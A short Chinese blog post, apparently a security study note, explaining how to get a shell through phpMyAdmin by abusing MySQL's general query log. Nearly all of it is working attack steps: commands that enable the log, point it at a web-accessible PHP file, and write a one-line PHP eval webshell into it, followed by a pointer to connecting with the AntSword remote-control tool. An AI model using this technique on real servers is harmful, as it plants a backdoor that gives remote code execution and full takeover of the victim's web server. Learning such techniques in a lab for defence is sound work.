phpmyadmin 日志getshell

发表于2023-11-28|更新于2023-11-28|网安基础getshell

|阅读量:

phpmyadmin 日志getshell

前提：拥有开启日志或修改日志的权限

查看日志是否开启

1	show variables like ‘general%’;

开启日志

1	set global general_log = on;

修改日志的路径到一个外部可访问的路径

1	set global general_log_file = ' C:/phpStudy/WWW/rizhi.php';

利用phpmyadmin日志的漏洞，写入一句话木马

1	select '<?php eval($_POST[1]); ?>';

此时木马已经被记录在日志里了

靶机视角：

利用远控工具链接一句话木马（蚁剑）

文章作者: Enderman_1

文章链接: https://endermanneer.github.io/2023/11/28/%E7%BD%91%E5%AE%89%E5%9F%BA%E7%A1%80%E7%AC%94%E8%AE%B0/phpmyadmin%E6%97%A5%E5%BF%97getshell/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Enderman_1's blog！

相关推荐

SQL注入基础

SQL注入（一）

SQL注入（三）

SQL注入（二）

关于锚点注入的深入探讨

XSS漏洞基础

数据库加载中